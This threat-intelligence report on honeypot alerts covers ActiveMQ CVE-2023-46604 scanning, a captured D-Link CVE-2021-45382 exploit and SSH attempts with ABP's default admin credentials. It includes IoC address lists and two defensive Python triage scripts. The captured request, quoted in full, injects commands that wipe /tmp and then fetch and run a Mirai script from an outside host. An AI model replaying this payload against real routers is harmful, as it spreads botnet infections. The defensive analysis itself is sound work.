
Our selection of alerts on honeypots: report 21 – November 2023

The following report consists of TEHTRIS observations on our worldwide honeypot network, to give you a picture of what is going on across the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends, and keeping an eye on what threat actors actively scan for during their reconnaissance phase, lets defenders adjust their cybersecurity posture accordingly.

Check out our previous report here.

Follow-up of CVE-2023-46604 exploit attempts

Surge monitored in the previous report (n°20)

Since our last report, we have monitored a global increase in exploit attempts targeting port 61616/TCP, which is ActiveMQ's default port.

CVE-2023-46604 (CVSSv3: 9.8), a remote code execution vulnerability in Apache ActiveMQ, was disclosed on October 24th. It has been listed in CISA's Known Exploited Vulnerabilities catalog since November 2nd.

On our worldwide honeypot network, we monitored a major increase in traffic targeting this specific port once a proof of concept (PoC) was publicly disclosed on GitHub on October 27th. The well-known IT and cyber media outlet Bleeping Computer also published an article on November 1st, which helped spread the information across the globe.

More than 700 unique IP addresses targeted this port over the past two weeks. They are mostly hosted in the US (77%), China (8%), Bulgaria (4%), Russia (3%) and Canada (2%). On the target side, European honeypots are now the main victims of this threat (18% of all hits, up from 12% last month), ahead of Singapore (14%, down from 17%). They are followed by honeypots hosted in Indonesia (14%), the UAE (8%) and Hong Kong (5%).

This phenomenon illustrates how the publication of a vulnerability, and of a PoC for it, can shape what is seen in cyberspace all around the world in just a few days.

Updated top 10 IoCs – all flagged as malicious by the VirusTotal community:

🇺🇸 US IP addresses hosted by AS 63949 (Akamai Connected Cloud)

  • 198.74.50[.]114
  • 45.33.78[.]70
  • 139.144.235[.]132
  • 143.42.1[.]53
  • 139.144.239[.]78
  • 170.187.165[.]139 – already in the top 10 in October

🇺🇸 US IP addresses hosted by AS 399045 (DEDIOUTLET-NETWORKS)

  • 68.69.186[.]14

🇨🇳 Chinese IP address hosted by AS 58461 (CT-HangZhou-IDC)

  • 183.136.225[.]9 – already in the top 10 in October

🇧🇬 BG IP address hosted by AS 394711 (LIMENET)

  • 91.92.248[.]140

🇷🇺 RU IP address hosted by AS 12389 (Rostelecom)

  • 81.177.125[.]9

Focus on a CVE-2021-45382 exploit attempt against D-Link routers

CVE-2021-45382 (CVSSv3: 9.8) is a remote command execution vulnerability in D-Link routers, reachable through the DDNS function of the ncc2 binary. The public write-up on GitHub clearly illustrates the lack of validation of user-supplied input in the ddnsHostName and ddnsUsername parameters.

On November 10th, the IP address 120.63.180[.]123 (hosted in India by AS 17813, Mahanagar Telephone Nigam Limited) targeted one of our European honeypots, hosted in Italy, on port TCP/80.

This IP address is flagged as malicious by the VirusTotal community.

Our honeypot captured the following request, which carries the parameters mentioned above:

POST /ddns_check.ccp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 300
Cookie: hasLogin=1
Connection: close

ccp_act=doCheck&ddnsHostName=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.180.48[.]100/l.sh;${IFS}sh${IFS}l.sh;&ddnsUsername=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.180.48[.]100/l.sh;${IFS}sh${IFS}l.sh;&ddnsPassword=123123123

The address 194.180.48[.]100 embedded in the request is known by the VirusTotal community for malicious activity related to the Mirai botnet. The same command sequence is injected into both the ddnsHostName and ddnsUsername parameters: it changes to /tmp, wipes the directory, downloads the file l.sh from that address with wget and runs it with sh. The ${IFS} shell variable stands in for spaces, a common trick to get past naive filtering of the space character.

This CVE has been listed in CISA's Known Exploited Vulnerabilities catalog since April 2022 for being exploited in the wild. The impacted routers have reached End of Life ("EOL") and, as such, this issue will not be patched. TEHTRIS recommends replacing the impacted hardware as soon as possible.
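The request above can be triaged automatically. The following Python is an added example written for this report, not TEHTRIS or D-Link code: it parses the raw ddns_check.ccp POST, undoes the ${IFS} obfuscation, lists the commands injected into each DDNS parameter, extracts the download URL as a defanged IoC, and shows the allow-list validation the vulnerable handler lacks. The embedded request is reconstructed from the capture above (defanging brackets removed so the URL parses, Content-Length dropped; the capture has no Host header and none is invented). The hostname and username rules are the author's assumptions about what a DDNS form should accept.

```python
"""Triage of a CVE-2021-45382-style ddns_check.ccp request (added example)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Reconstructed from the honeypot capture in the report.
CAPTURED_REQUEST = (
    "POST /ddns_check.ccp HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "X-Requested-With: XMLHttpRequest\r\n"
    "Cookie: hasLogin=1\r\n"
    "Connection: close\r\n"
    "\r\n"
    "ccp_act=doCheck"
    "&ddnsHostName=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}"
    "http://194.180.48.100/l.sh;${IFS}sh${IFS}l.sh;"
    "&ddnsUsername=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}"
    "http://194.180.48.100/l.sh;${IFS}sh${IFS}l.sh;"
    "&ddnsPassword=123123123"
)

# Parameters the vulnerable ncc2 handler passes to a shell unvalidated.
INJECTABLE_FIELDS = ("ddnsHostName", "ddnsUsername")

IFS_RE = re.compile(r"\$\{IFS\}|\$IFS\b")         # ${IFS} / $IFS used instead of spaces
INJECTION_RE = re.compile(r"[;|&\n`]|\$\(")       # separators and command substitution
SPLIT_RE = re.compile(r"[;|&\n]")                 # where one injected command ends
URL_RE = re.compile(r"https?://[^\s;|&'\"<>]+")

# Assumed allow-lists (RFC 1123-style hostname labels, simple usernames).
HOSTNAME_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{HOSTNAME_LABEL}(?:\.{HOSTNAME_LABEL})*$")
USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def parse_request(raw):
    """Split a raw HTTP request into (request line, headers dict, form fields dict)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {}
    # Split on '&' before decoding so an encoded %26 inside a value stays inside it.
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote_plus(key)] = unquote_plus(value)
    return lines[0], headers, fields


def deobfuscate(value):
    """Replace ${IFS}/$IFS with a space so the injected command line reads normally."""
    return IFS_RE.sub(" ", value)


def injected_commands(value):
    """Return the shell commands smuggled into a form value ([] when it looks clean)."""
    if not INJECTION_RE.search(value):
        return []
    return [p.strip() for p in SPLIT_RE.split(deobfuscate(value)) if p.strip()]


def defang(url):
    """Bracket the last dot of the host, the convention used in the report."""
    host = urlsplit(url).hostname or ""
    head, dot, tail = host.rpartition(".")
    return url.replace(host, f"{head}[.]{tail}", 1) if dot else url


def analyze(raw):
    """Triage one request: injected fields, decoded commands and defanged IoCs."""
    request_line, _headers, fields = parse_request(raw)
    findings, iocs = {}, []
    for name in INJECTABLE_FIELDS:
        commands = injected_commands(fields.get(name, ""))
        if commands:
            findings[name] = commands
            for url in URL_RE.findall(" ".join(commands)):
                if defang(url) not in iocs:
                    iocs.append(defang(url))
    return {"request": request_line, "injected": bool(findings),
            "fields": findings, "iocs": iocs}


def is_valid_hostname(value):
    """Allow-list check a DDNS handler should apply before touching a shell."""
    return len(value) <= 253 and HOSTNAME_RE.match(value) is not None


def is_valid_username(value):
    return USERNAME_RE.match(value) is not None


if __name__ == "__main__":
    result = analyze(CAPTURED_REQUEST)
    for field, cmds in result["fields"].items():
        print(f"{field}: {' ; '.join(cmds)}")
    print("IoCs:", result["iocs"])
```

Run against the captured request, both DDNS parameters decode to the same four commands and the only IoC produced is http://194.180.48[.]100/l.sh; the same value fails both allow-list checks, which is the control the vulnerable handler is missing.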

Focus on SSH connection attempts with admin/1q2w3e

Almost 40 unique IP addresses attempted to log in to the SSH services exposed by our honeypots using the following credentials:

Login: admin

Password: 1q2w3e

These credentials correspond to the default credentials of the ABP framework, which offers an architecture for building enterprise software solutions.
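Clusters like this one are easy to surface when honeypot login events are grouped by credential pair rather than by source. The Python below is an added example, not TEHTRIS tooling: it reads Cowrie-style JSON login events, counts distinct source IPs per (username, password) pair, and raises an alert when a pair from a watchlist of product default credentials is tried from several sources. The events are constructed for the example, and the watchlist holds only the pair the report describes.

```python
"""Spot campaigns that spray a product's default SSH credentials (added example)."""
import json
from collections import defaultdict

# Known default credential pairs worth watching (assumed inventory; the ABP
# entry is the pair discussed in the report).
DEFAULT_CREDENTIALS = {
    ("admin", "1q2w3e"): "ABP framework default administrator",
}

# Constructed Cowrie-style JSON lines; addresses are documentation ranges.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"eventid": "cowrie.login.failed", "src_ip": "198.51.100.10", "username": "admin", "password": "1q2w3e"},
    {"eventid": "cowrie.login.failed", "src_ip": "198.51.100.10", "username": "admin", "password": "1q2w3e"},
    {"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "username": "admin", "password": "1q2w3e"},
    {"eventid": "cowrie.login.failed", "src_ip": "192.0.2.44", "username": "admin", "password": "1q2w3e"},
    {"eventid": "cowrie.login.failed", "src_ip": "192.0.2.44", "username": "root", "password": "123456"},
    {"eventid": "cowrie.session.connect", "src_ip": "192.0.2.45"},
])

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def credential_sources(log_text):
    """Map (username, password) -> set of distinct source IPs that tried it."""
    sources = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("eventid") not in LOGIN_EVENTS:
            continue  # connection/command events carry no credentials
        sources[(event["username"], event["password"])].add(event["src_ip"])
    return sources


def default_credential_alerts(log_text, min_sources=2):
    """Alerts for watch-listed default pairs tried from at least min_sources IPs.

    Counting distinct sources rather than attempts separates a distributed
    campaign from a single noisy bot retrying the same pair.
    """
    alerts = []
    for pair, ips in credential_sources(log_text).items():
        product = DEFAULT_CREDENTIALS.get(pair)
        if product and len(ips) >= min_sources:
            alerts.append({"username": pair[0], "password": pair[1],
                           "product": product, "unique_sources": len(ips),
                           "sources": sorted(ips)})
    return sorted(alerts, key=lambda a: -a["unique_sources"])


if __name__ == "__main__":
    for alert in default_credential_alerts(SAMPLE_EVENTS):
        print(f"{alert['username']}/{alert['password']} ({alert['product']}): "
              f"{alert['unique_sources']} sources {alert['sources']}")
```

On the constructed events the admin/1q2w3e pair is seen from three distinct sources and triggers one alert, while root/123456 is counted but not alerted because it is not on the watchlist.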

Figure: geographical distribution of victim honeypots

Top 10 IoCs – all flagged as malicious by the VirusTotal community:

ASIA

🇨🇳 China

  • 183.237.47[.]139
  • 49.234.53[.]247
  • 43.138.29[.]247
  • 43.138.223[.]128

🇰🇷 Korea

  • 61.80.237[.]204

🇸🇬 Singapore

  • 43.156.237[.]23

EUROPE

🇵🇹 Portugal

  • 85.240.175[.]100

🇫🇷 France

  • 46.105.158[.]45

AMERICAS

🇺🇸 United States

  • 72.240.125[.]133

🇵🇪 Peru

  • 45.71.33[.]220



      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.